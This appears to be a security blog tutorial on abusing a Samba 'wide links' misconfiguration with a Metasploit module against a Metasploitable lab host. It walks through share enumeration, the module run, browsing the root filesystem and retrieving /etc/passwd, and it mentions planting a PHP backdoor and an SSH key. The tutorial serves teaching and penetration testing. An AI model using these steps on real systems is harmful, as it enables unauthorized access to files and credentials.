Samba can be configured to allow any user with write access the ability to create a link to the root filesystem. Once an attacker has this level of access, it's only a matter of time before the system gets owned. Although this configuration isn't that common in the wild, it does happen, and Metasploit has a module to easily exploit this security flaw.
Symbolic links, or symlinks, are files that link to other files or directories on a system, and they are an essential part of the Linux environment. Symlinks are often used to connect libraries and redirect certain binaries to other versions.
File share systems, like Samba, can take advantage of symbolic links, allowing users to easily access linked folders and files. But these links are normally confined to within the share itself, making it impossible to access the underlying filesystem.
Samba does have an option to use wide links, which are basically symlinks that are allowed to link outside of the sandboxed file share. This is obviously a huge security hole, as any user with write access to a share can create a link to the root filesystem.
The first thing we need to do after discovering that the SMB service is running on the target is to see if we can get access to the shares and, if so, find their names. We can use smbclient to do so:
~# smbclient -L //10.10.0.50/ Enter WORKGROUP\root's password: Anonymous login successful Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) Reconnecting with SMB1 for workgroup listing. Anonymous login successful Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP METASPLOITABLE
Above, we can see that we are able to log in anonymously and list the shares. It looks like there are a couple of default shares, but the one that looks interesting is labeled tmp. It even has a comment that looks suspicious, so we'll use this as our target share.
Next, fire up Metasploit by typing msfconsole in the terminal.
~# msfconsole [-] ***rting the Metasploit Framework console.../ [-] * WARNING: No database support: No database YAML file [-] *** . . . dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o ' dB' BBP dB'dB'dB' dBBP dBP dBP BB dB'dB'dB' dBP dBP dBP BB dB'dB'dB' dBBBBP dBP dBBBBBBB dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP . . dB' dBP dB'.BP | dBP dBBBB' dBP dB'.BP dBP dBP --o-- dBP dBP dBP dB'.BP dBP dBP | dBBBBP dBP dBBBBP dBBBBP dBP dBP . . o To boldly go where no shell has gone before =[ metasploit v5.0.20-dev ] + -- --=[ 1886 exploits - 1065 auxiliary - 328 post ] + -- --=[ 546 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] msf5 >
Once we're in and greeted by the login banner, we can search for a suitable module to use with the search command:
msf5 > search samba symlink Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal 1 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow 2 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow 3 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow 4 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules 5 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State 6 auxiliary/server/wget_symlink_file_write 2014-10-27 normal No GNU Wget FTP Symlink Arbitrary Filesystem Access 7 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) 8 exploit/linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation 9 exploit/linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation 10 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) 11 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load 12 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow 13 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow 14 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) 15 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow 16 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution 17 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow 18 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) 19 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow 20 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) 21 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection 22 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution 23 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution 24 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution 25 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow 26 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow 27 exploit/windows/local/ms13_097_ie_registry_symlink 2013-12-10 great No MS13-097 Registry Symlink IE Sandbox Escape 28 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource 29 post/linux/gather/enum_configs normal No Linux Gather Configurations
We received a lot of results from that search term, but the one we want to use is actually the first one. Load the module with the use command, followed by the path of the module:
msf5 > use auxiliary/admin/smb/samba_symlink_traversal
Now that we are loaded into the context of the module, we can use the options command to see the settings:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > options Module options (auxiliary/admin/smb/samba_symlink_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBSHARE yes The name of a writeable share on the server SMBTARGET rootfs yes The name of the directory that should point to the root filesystem
It looks like it already has port 445 set as the correct port for SMB, as well as the name of the directory that will be created that links to the root filesystem. We need to set the RHOSTS option as the IP address of the target:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set rhosts 10.10.0.50 rhosts => 10.10.0.50
And the name of the share we want to write to, in this case, the tmp share:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set smbshare tmp smbshare => tmp
Now we should be all set, and all we have to do is type run at the prompt to launch the module:
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run [*] Running module against 10.10.0.50 [*] 10.10.0.50:445 - Connecting to the server... [*] 10.10.0.50:445 - Trying to mount writeable share 'tmp'... [*] 10.10.0.50:445 - Trying to link 'rootfs' to the root filesystem... [*] 10.10.0.50:445 - Now access the following share to browse the root filesystem: [*] 10.10.0.50:445 - \\10.10.0.50\tmp\rootfs\ [*] Auxiliary module execution completed
It spits out what it is doing as it runs — we can see it first connects to the server and mounts the writable share we specified. Then, it creates a link to the root filesystem and tells us where to go to access it. Perfect.
Once the module does its thing, we can exit Metasploit with the exit command and connect to the target SMB share with smbclient:
msf5 > exit ~# smbclient //10.10.0.50/tmp Enter WORKGROUP\root's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \>
We can log in anonymously again and use the ls command to view the contents of the share:
smb: \> ls . D 0 Wed Aug 8 10:52:28 2018 .. DR 0 Sun May 20 13:36:12 2012 4600.jsvc_up R 0 Wed Aug 8 08:57:48 2018 .ICE-unix DH 0 Wed Aug 8 08:56:05 2018 .X11-unix DH 0 Wed Aug 8 08:56:51 2018 .X0-lock HR 11 Wed Aug 8 08:56:51 2018 rootfs DR 0 Sun May 20 13:36:12 2012 7282168 blocks of size 1024. 5430648 blocks available
It looks like there's a new directory here, the one that was created with the Metasploit module. This is a link, and we can enter it just like a normal directory. Let's do that and see what's inside:
smb: \> cd rootfs\ smb: \rootfs\> ls . DR 0 Sun May 20 13:36:12 2012 .. DR 0 Sun May 20 13:36:12 2012 initrd DR 0 Tue Mar 16 17:57:40 2010 media DR 0 Tue Mar 16 17:55:52 2010 bin DR 0 Sun May 13 22:35:33 2012 lost+found DR 0 Tue Mar 16 17:55:15 2010 mnt DR 0 Wed Apr 28 15:16:56 2010 sbin DR 0 Sun May 13 20:54:53 2012 initrd.img R 7929183 Sun May 13 22:35:56 2012 home DR 0 Fri Apr 16 01:16:02 2010 lib DR 0 Sun May 13 22:35:22 2012 usr DR 0 Tue Apr 27 23:06:37 2010 proc DR 0 Wed Aug 8 08:55:30 2018 root DR 0 Wed Aug 8 08:56:51 2018 sys DR 0 Wed Aug 8 08:55:31 2018 boot DR 0 Sun May 13 22:36:28 2012 nohup.out R 20962 Wed Aug 8 08:56:51 2018 etc DR 0 Wed Aug 8 08:56:23 2018 dev DR 0 Wed Aug 8 08:56:06 2018 vmlinuz R 1987288 Thu Apr 10 11:55:41 2008 opt DR 0 Tue Mar 16 17:57:39 2010 var DR 0 Wed Mar 17 09:08:23 2010 cdrom DR 0 Tue Mar 16 17:55:51 2010 tmp D 0 Wed Aug 8 10:52:28 2018 srv DR 0 Tue Mar 16 17:57:38 2010 7282168 blocks of size 1024. 5430648 blocks available
And there we have it — root filesystem access. We can now do things like view /etc/passwd, though we can't do that directly. Simply change into the /etc/ directory and use the get command to download the file to our machine:
smb: \rootfs\> cd etc smb: \rootfs\etc\> get passwd getting file \rootfs\etc\passwd of size 1581 as passwd (128.7 KiloBytes/sec) (average 128.7 KiloBytes/sec)
~# cat passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false
Since we now have access to the root filesystem, there are several different paths an attacker can take. It all depends on the attacker's imagination and the configuration of the target.
There is one major caveat here: even though we have root access to the filesystem, we do not have root privileges. We only have the permissions associated with the anonymous login to the tmp share (usually normal user privileges). This limits what can be done, but depending on how the server is configured, there are a few things we could try.
For instance, since we have write access, we could place a PHP backdoor in the web root directory of Apache, and navigate to it in the browser to trigger a shell to our local machine. Another attack vector, if SSH config file permissions are lax, would be to add ourselves to the authorized keys file, allowing us to SSH into the box.
As a hacker, it is essential to be creative, and even in situations where escalating to shell access seems impossible, with enough patience and creativity, it can be done.
Today, we learned about wide links in Samba and how they can be abused to access the root filesystem. After verifying we could access an SMB share, we used a Metasploit module to create a link pointing to the root directory on the server. We could then view the root filesystem and explored a couple of possible attack vectors. The ability to leverage a simple misconfiguration to exploit the system should be the goal of any white-hat hacker.